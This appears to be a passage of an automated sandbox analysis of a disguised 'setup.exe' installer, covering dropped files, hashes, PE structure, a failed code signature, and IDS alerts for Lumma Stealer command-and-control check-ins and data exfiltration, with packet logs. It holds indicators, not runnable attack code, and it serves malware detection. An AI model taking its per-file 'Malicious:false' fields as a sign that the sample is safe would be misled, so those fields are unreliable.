                                    SHA-512:E2345B1E3B568DF6089BF880E48756348B3F41C893D1F38C845895C9A36BD2F3F217FEAF8440B66D3ECFCB23A4CEBA102F9BE9C53AF58CEC979A3C2662829E98
                                    Malicious:false
                                    Preview:zxe]...@%...Zw.^9.>'T.....T.. +[vx...eC....!.....O.../d[..wn];_...?O.C"..Cpz...=pJ..."'.LQ..Z.l.-..M..p@.R_......_.a.....`L..%V..r....B.x...5'.b.!...;Ja.Kx...a.R.BB.g.......l...M....g.ez...f7x.."F...56.E7.. =.j......./n`.G..G'R...Li....N.'.>u3...j.X..%..M...4..[....s......).T2.6kS..L..P....D..:m...:.)3Rzd.(.....tzDL*.%..s.+yh..^........`Y.8N.........,..Ti.:a.......O,........X.U..:ho0......].n..k....@.|#..k......i..fX.l.b.C\.He...I...w..=...C.R.v...y.[..1...cK..OQb..s.e...J..snx`.@........*.....a....Q7=.w;.P....PZVF<..N/!]:.8..}[w._..!.....{.....&.....6...G.?..&FJ...m....LR.h.-...;...M}s_.....3.;gp.'....W..^@S...!.KoJ.I.&ml...[..#.K...6.......J..Y.8.E.9.l!...v.Eh..Kr..O>.+....$..(........h.B..+K.../d[.s....:@.@..r....4?4.....:e.n.zp^..0."~QI}h..*.Ce....F...Z.7.BR\....... 8.f....x..:.d....v.(....?.@f.2..y.t.g..F....d.O....X...t...@v....*|....,X.>Z......y.en..h.G)....q...{3.V...&..........u.PW.D...1....s.^..l.k.,zr.K-5.Gk............Y8....
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:DOS executable (COM)
                                    Category:dropped
                                    Size (bytes):135168
                                    Entropy (8bit):6.637196706228119
                                    Encrypted:false
                                    SSDEEP:3072:KPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqV4:KPj0nEo3tb2j6AUkB0CThp6vmV4
                                    MD5:22FED7224B5D03CC9A0388A08771838C
                                    SHA1:E8380A47AB0C67D478D7B54AF35A0D0E998D96FE
                                    SHA-256:D8726603EA5D8CF6DD256D110906DA259967B19380BA7A334FAE01265A6BDAE7
                                    SHA-512:867DBF9432055ED4A09B95C4E21157A9EBD998AD4767F979601CE6821F660FEFABA89919327BAF6196E9FB7B78F1495E048D4828C4B8981C44FC5DB84A0D6B8E
                                    Malicious:false
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 0%
                                    Preview:.W...h.L...h..L..E.P.M..D.........K.P.l....M...........h.L...h.L...h,wL...h..L..h.L..j&..j..U.Y.Q......M..n...E.....j+..j...j#..j...j...j...j...j...j...j..j..j..j..j..j..E..E.....P......P....I......h..........P....I.....J.........=.#M..tHh..I.....I.....t.hh.L.V....I...u....A.h..........Q.........V....I.....h..........P....I......s........F.................s........F................s.........F................s....c....F............m....s....G....F............Q....s....+....F............5....s.........F.................s.........F.................s.........F................3..=h#M....3..=.)M...s......E......F......E....s.......3.@.F........s....t....F.......@....~....s....X....F.......A....b....s....<....F.......B....F....s.... ....F.......C....*.....................t................Ph......$.I.........#M...tU...t....u....L......8~L........L...........}.3.S....[.....L..w..O..W..E.... ..Z......L..P...h..L.....3.@8..#M.u..K.h(.L....3.@8..#M.u..8.L......8.
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):40046
                                    Entropy (8bit):7.995985530508175
                                    Encrypted:true
                                    SSDEEP:768:yl2VcKVXHHXV/jjasuDjGey2zkLSUR7JbP2GcqFIXk75uPLXNMRGD/A9urgk1Ol2:yl2iK9H39HaRFdoSmbPt5jOLmRGjAyg0
                                    MD5:EA1F9FDD115297D606B829A08D02DCF2
                                    SHA1:972C64393EA525F29CB8EE75257772FE48FB8D43
                                    SHA-256:CB8EEE0984FDA76C6DF07EE2561CB59510BA80236F96778DC4F66DC5D4145DA7
                                    SHA-512:0FB6D333670FE12F7FFE4EA4EAD804BC1D027150A6AF94C150729C0BC4779F79A2F679E62E3A90C0CE749723500DB4F7232439B97EAF975FAA5584F6EB07CF1F
                                    Malicious:false
                                    Preview:R1..*n.....0..:d..R.w..%3.m..BX.?......~..\...S.SK.ct(..f'...h.T8.....H.../)(..'..U.b..lE+t....f...c......P|8.S.3`.d.M......9......_8...0..<.C.7.u.d. 8.@{..M..99.3.?...z........mJ.....E@.....e/'.k.5.|....<..........\.V\...C......<.........Z..x.U.f.rT...b..p...~t...^.L......PFw.U.....v..I.=z.vRw.la:e.-4#....iT\ADK.bh..e..l...+.. )MD...{,..Y...X.......J.3}...~v*.Eo%p.>._...GQ.!...ZA.9.M.6...y..G...^.~...S2&..t..U..".O).?.GW....qm.91.f.qc...(.;..1...D(...%..U...............;.p.....1.'v.F.\..............&.....d..$...hU.)e....1.`.?[../~.D9}.ev...-....o......6......n.(?3..+t...Oux.I1..]ng.u....@......|h<q..\H..........T........sp{2...~Qu.w.H^._..!..y...5...bb..^.?o.l.0..Mrk..*.M....":!...6.g.aQ9..H(9ee..W.~.e.@.V...R.h8.M[..Oc.X..x....8)I..@.a&.0...l.j....2....`t...?..H.b.....awR#R.v>2.F...n.....t."k.......Q.Ld5...hqO8};l....9.JM....W..J~.Ym..~B9ej.ug.=_.d.....M.t9,.d.!...C..Y..{.'f.$.k,......|.....\....rz.........A.......$....qx.........
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):51200
                                    Entropy (8bit):5.721489966425017
                                    Encrypted:false
                                    SSDEEP:1536:OhWoXElJUzdlDfFgQa8BpDzdZPp7HE+tKA3QkvyNf7XwH:MWoUlJUPdgQa8Bp/LxyA3laWH
                                    MD5:5264EF29AF53AB79B9BE0E48D8D25E1B
                                    SHA1:C25C09D953ED58FED5A37860F3709E64836792D2
                                    SHA-256:16317BBCF81301FA60999541273E1EA6D779B089116FE9F56B328CFA9A656201
                                    SHA-512:8F1AD44428223B9271CC4785942F923E7A2A1175F0F0B4E544F1C57084040615ABF3545D61FB0C06DD9761B9D144017AAF816F0EBD72F0AA43357DD3629255A8
                                    Malicious:false
                                    Preview:..L$\.L$tf;........D$D.......l$@..D$Du.L$H;..........L$h.Q....\$h.C..)....L$H.D$`.\$p.P...ti.B.;..._....:...L$D..................D$t.....L$@...f;.......f9D$t.......L$`.B..A....B....z..t......D$?..|$?....L$h.@..A....L$l.@..A.....5M..A.....5M..A..................@...........$.....}..u..L$,P..WV..........Z...\$$.E..1..........l$D...,....B..L$H;...D......L$l.Q....\$l.C..\$p.............X...$...A.....b...j..,....L$$....D$ .D$P...H..|$LG.|$L....._........V....}..D$4.\$,.D$..D$0.\$$.D$..u..J.............$........D$D.....L$@...f;.......f9D$D.|....D$\f9D$x.......L$`.B..A....B....z....x.........|$..D$.................M.t9.C...........s...............S..h..M....C............f....T$..E.G.|$..|$0...E..@..4......}......6...G....E..G......7.}....u........3M......X....$.....p5M..D$?.;........V.....5M........5M......D$`t5M..D$ht5M..t$p.{..F..D$H.....V.......V.....6;.r4....t*.I.....D$\.....L$x...f;................u.3..,..t......D$\.....L$x...f;.......f9D$\.....@....a....j.D$?..|$?..L$h.C..A...3M
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):77824
                                    Entropy (8bit):6.754289605573463
                                    Encrypted:false
                                    SSDEEP:1536:h+Sh+I+FrbCyI7P4Cxi8q0vQEcmFdni8yDGVFE5gOHu1CZ:4SAU4CE0Imbi80Z
                                    MD5:F924D29B65337DD04EFB400ECDBBD9B2
                                    SHA1:15680E3E880418DEDA966E0A4A3E4B67CF4CE3B1
                                    SHA-256:33626952B53B46B58AE32C4C7D1A4B054551518C9E050267A2CAD863C6D7A818
                                    SHA-512:0EEFE4043390659D2A25C548B705F73257EC998AB9FED576535AA85406F8A8BA9526E5525583F6D91988747BADF2F0B0F992AC412C41B1FD7FF2C86319E1FB90
                                    Malicious:false
                                    Preview:..YY..t.8] .........p...X....:.............t...-F.J.3.8] j0....E.....K3............'...].Xu...F.B...%......u.!M....E.........1F..F.M..u.......E.............B.%.....E.w..:........e.......j0X.E..M...~S...R.#E.#.M..............j0Yf.......9v...M..U...F.E......E..E.......O.M..E.f..y.f..xW...R.#E.#.M...........b...f...v6j0.F.[....ft...Fu...H..].;E.t.....9u...:...........@...~.Wj0XPV..........E.8.u....} ..4.U......$..p.....R........3......+M...x.....r..F.+......F.-..........j0X....|?.......;.r.j.PSQ.....0.U..F;.u...|.....dr.j.jdSQ.....0.U..F;.u...|......r.j.j.SQ.x....0.U..Fj0X..3....F...}..t..M..P......_^[..]..U.....E.V.u.W.u..u..~.P.E.W.p..0.a.........9M.t..M.3..}.-...+.3......+.E.PW.}.Q3.}.-...3..........P.6........t.......u(.E.j.P.u$.u V.u.W....... _^..]..U....VW.}...~.....3....9E.w....j"^.0......_^..].S.u$.M..B....U .]...t%.M.3......P3..9-.....P.u.S......U ....E...8-u...-.s...~..F...F.E...........3.............9E.t...+..E.h.;J.PV........[..uv.N.8E.t...E.U..B
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):101376
                                    Entropy (8bit):6.3647570127643975
                                    Encrypted:false
                                    SSDEEP:1536:f5el3EYrDWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE7:f5elDWy4ZNoGmROL7F1G7ho2kOQ
                                    MD5:A271C89EE02656F8A9C9DC6005A767C1
                                    SHA1:DC1C94CA8DBE68CCE95F5D9082EFA01C9131FB0A
                                    SHA-256:40D95AD335DDFFB637F4E569B19A3DD973D25021FC08E219C20A6B789ADD043A
                                    SHA-512:1CD7B91F63D14932D033A871B5CB6AB9BD692CD10A403240FAC1DA0D74C80F622F3B5723D1A746AF867627EF1C675F7FD6625A11C2FC04711AE57D627677C530
                                    Malicious:false
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\setup.exe
                                    File Type:Microsoft Cabinet archive data, 487852 bytes, 12 files, at 0x2c +A "Yale" +A "Kissing", ID 9157, number 1, 29 datablocks, 0x1 compression
                                    Category:dropped
                                    Size (bytes):487852
                                    Entropy (8bit):7.998628853567534
                                    Encrypted:true
                                    SSDEEP:12288:4vD5qWrer43O2ss6DP8Z09WdsAvsYpZ43rizQYY+:WbrerXQ6DP8u9WdsmXZo+
                                    MD5:EE93C2F04396717910ABBFBFD9A151FB
                                    SHA1:29C4C6A67457DF0FA39C60A45A6FD698C3DC484B
                                    SHA-256:ABD5E91C3960DFBEF083C3E63B933E7176168A4B160B782299B9A5CB36943EB3
                                    SHA-512:CFD7A18DD83CCA89256DADC8118CE6C4B01EFF6085E024BF7E53264A23C5D0BDC3BE8E825ED747CB40514DA14F2D1B1FFB60BBA71C7B254E5F87607BFE79C7B7
                                    Malicious:false
                                    Preview:MSCF.....q......,................#..P.................?Z.b .Yale..8........?Z.b .Kissing......>....?Z.b .Accepts...........?Z.b .Vacuum..t........?Z.b .Separate......R....?Z.b .Quotations.....^\....?Z.b .Photographer..t..^P....?Z.b .Continuing.....^.....?Z.b .Hours.....^.....?Z.b .Verde..0..^4....?Z.b .Valium.....^d....?Z.b .Training...H.4..CK.;{|.U..X @.*O.% ..R..e..i..$iH.."mC.6.4)y.PP.2...cd\]Q..".."...+...(...nV.....e.{....Z....8......{....F".....\D..... .e.>....9....J?..../......Cqcs,...6.}.?.0...c.1.1.+...?P.o.....7.....}A.57L....k...9..=...s.{.C...@.<>....../J._...|.q..<......kO........x......7.......7.D.-.;...e.D.I2*.ON.|.R/B..b............h.......O.........].*36..<...<..Nu.%.....~.f,<'.#.%..........<2....*]......(.X..g..{1.(...1FB.b~o.K._.1....^.q.nq..F.j.k..RNq.i..+..c>(#..3.........(...S..e.<.W;..W.....+1.N.O.M.C.f..8.C....i.4...sHp.m..5...=....c..u........'...9...i.......+...P|P...h..a....a%k.P.#..0k.y.Fl...a..k...a{i.....m-mC.U.+.-ou.
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1671
                                    Entropy (8bit):4.712685291649495
                                    Encrypted:false
                                    SSDEEP:24:OdyGS9PvCA433C+sCNC1skNkvQfhSHQU2L55e1yb/uBx39lt6DhBhhBf:v9n9mTsCNvEQH5O5U1nPKrhBf
                                    MD5:2110D5656FE3BAC9ACDDCBB6F981D424
                                    SHA1:0D8CA0EF393419CA1CA453E6C34B7C65FC60B6F3
                                    SHA-256:34846CA023D1742503C2EAAEB6C797268E15FA71DD2FCB9AC4E3C102A6207875
                                    SHA-512:826AB8C4F3252F0A31087E8A6601F9D3BDD9B47A1629F5546210547F994B5AEB11A77631101ABA3CE1E0CAA2CE992C5442DF774C46794817D363E5046B7B518B
                                    Malicious:false
                                    Preview:Tranny........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B..........................................................................................................................................................................................................................................................................
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):4.279946210431455
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:setup.exe
                                    File size:83'896'395 bytes
                                    MD5:c804e1074af9d7cffa16e6bd084bea42
                                    SHA1:dba96c1d8dd56520fcbc65b1d1dd0a8da91e81c5
                                    SHA256:d0710b55aa4f4424d4b14ad320e6615dc230f2af271a1f260ea475141f9d0091
                                    SHA512:950a9a8822cb6df38d710cf1341a79ce25e76e8f145471167dda49f8e6c9e9b22a88836d51ee69b4770c69cef3d161be7fc408de336d1d8a53f1bbad40accadd
                                    SSDEEP:24576:0/8vj/qTTY54U9wn04+riuApVGgH7x86jeIGyghi:HKrHn8Xy3HtjePymi
                                    TLSH:4A0812B627DDA384D9152B20EBC7D0AC607A38B572307A4865EDF24D633B102A6FDF51
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8.....
                                    Icon Hash:6609488d15988030
                                    Entrypoint:0x403883
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:be41bf7b8cc010b614bd36bbca606973
                                    Signature Valid:false
                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                    Signature Validation Error:The digital signature of the object did not verify
                                    Error Number:-2146869232
                                    Not Before, Not After
                                    • 09/03/2023 01:00:00 12/03/2025 00:59:59
                                    Subject Chain
                                    • CN="Oracle America, Inc.", O="Oracle America, Inc.", L=Redwood City, S=California, C=US
                                    Version:3
                                    Thumbprint MD5:5F429788727974C52EF1B4CD93D03B8F
                                    Thumbprint SHA-1:CD7BE0F00F2A5EE102C3037E098AF3F457D3B1AB
                                    Thumbprint SHA-256:4B59D847D7187ED910590D52798FD7E6FCB13396092FDBC1FE43B2311AAB6EEB
                                    Serial:060E2F8F9E1B8BE518D5FE2B69CFCCB1
                                    Instruction
                                    sub esp, 000002D4h
                                    push ebx
                                    push ebp
                                    push esi
                                    push edi
                                    push 00000020h
                                    xor ebp, ebp
                                    pop esi
                                    mov dword ptr [esp+18h], ebp
                                    mov dword ptr [esp+10h], 00409268h
                                    mov dword ptr [esp+14h], ebp
                                    call dword ptr [00408030h]
                                    push 00008001h
                                    call dword ptr [004080B4h]
                                    push ebp
                                    call dword ptr [004082C0h]
                                    push 00000008h
                                    mov dword ptr [00472EB8h], eax
                                    call 00007FE0710B1E3Bh
                                    push ebp
                                    push 000002B4h
                                    mov dword ptr [00472DD0h], eax
                                    lea eax, dword ptr [esp+38h]
                                    push eax
                                    push ebp
                                    push 00409264h
                                    call dword ptr [00408184h]
                                    push 0040924Ch
                                    push 0046ADC0h
                                    call 00007FE0710B1B1Dh
                                    call dword ptr [004080B0h]
                                    push eax
                                    mov edi, 004C30A0h
                                    push edi
                                    call 00007FE0710B1B0Bh
                                    push ebp
                                    call dword ptr [00408134h]
                                    cmp word ptr [004C30A0h], 0022h
                                    mov dword ptr [00472DD8h], eax
                                    mov eax, edi
                                    jne 00007FE0710AF40Ah
                                    push 00000022h
                                    pop esi
                                    mov eax, 004C30A2h
                                    push esi
                                    push eax
                                    call 00007FE0710B17E1h
                                    push eax
                                    call dword ptr [00408260h]
                                    mov esi, eax
                                    mov dword ptr [esp+1Ch], esi
                                    jmp 00007FE0710AF493h
                                    push 00000020h
                                    pop ebx
                                    cmp ax, bx
                                    jne 00007FE0710AF40Ah
                                    add esi, 02h
                                    cmp word ptr [esi], bx
                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ C ] VS2010 SP1 build 40219
                                    • [RES] VS2010 SP1 build 40219
                                    • [LNK] VS2010 SP1 build 40219
                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x2316.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x4ffffeb0x2860
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0xf40000x23160x2400d622028710ffa23845b627aedc1fb1dfFalse0.7804904513888888data6.9654543785696825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0xf70000xf320x100015b9f56f7291deb167edde36568be2e9False0.79931640625data6.901933192448209IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0xf42980xe36PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9483232545354591
                                    RT_ICON0xf50d00x46ePNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0061728395061729
                                    RT_ICON0xf55400x2e3PNG image data, 96 x 96, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0148849797023005
                                    RT_ICON0xf58240x249PNG image data, 72 x 72, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0188034188034187
                                    RT_ICON0xf5a700x1fbPNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.017751479289941
                                    RT_DIALOG0xf5c6c0x100dataEnglishUnited States0.5234375
                                    RT_DIALOG0xf5d6c0x11cdataEnglishUnited States0.6056338028169014
                                    RT_DIALOG0xf5e880x60dataEnglishUnited States0.7291666666666666
                                    RT_GROUP_ICON0xf5ee80x4cdataEnglishUnited States0.7894736842105263
                                    RT_VERSION0xf5f340x10cdataEnglishUnited States0.6417910447761194
                                    RT_MANIFEST0xf60400x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                    DLLImport
                                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                    USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                    SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                    ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States
                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2025-01-31T19:55:27.414990+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549859172.67.158.151443TCP
                                    2025-01-31T19:55:27.918654+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549859172.67.158.151443TCP
                                    2025-01-31T19:55:27.918654+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549859172.67.158.151443TCP
                                    2025-01-31T19:55:28.426156+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549865172.67.158.151443TCP
                                    2025-01-31T19:55:28.933956+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549865172.67.158.151443TCP
                                    2025-01-31T19:55:28.933956+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549865172.67.158.151443TCP
                                    2025-01-31T19:55:29.615601+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549876172.67.158.151443TCP
                                    2025-01-31T19:55:33.019549+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549897172.67.158.151443TCP
                                    2025-01-31T19:55:33.697217+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549897172.67.158.151443TCP
                                    2025-01-31T19:55:34.278514+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549908172.67.158.151443TCP
                                    2025-01-31T19:55:35.656321+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549916172.67.158.151443TCP
                                    2025-01-31T19:55:37.106613+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549926172.67.158.151443TCP
                                    2025-01-31T19:55:39.254001+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549941172.67.158.151443TCP
                                    2025-01-31T19:55:39.780089+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549941172.67.158.151443TCP
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 31, 2025 19:55:26.920375109 CET49859443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:26.920392036 CET44349859172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:26.920572996 CET49859443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:26.921678066 CET49859443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:26.921686888 CET44349859172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:27.414891958 CET44349859172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:27.414989948 CET49859443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:27.419262886 CET49859443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:27.419267893 CET44349859172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:27.419672966 CET44349859172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:27.463541031 CET49859443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:27.464637995 CET49859443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:27.464653969 CET49859443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:27.464997053 CET44349859172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:27.918677092 CET44349859172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:27.918939114 CET44349859172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:27.919009924 CET49859443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:27.920556068 CET49859443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:27.920563936 CET44349859172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:27.920586109 CET49859443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:27.920589924 CET44349859172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:27.926614046 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:27.926640987 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:27.926707983 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:27.926973104 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:27.926983118 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.426013947 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.426156044 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:28.429537058 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:28.429559946 CET44349865172.67.158.151192.168.2.5
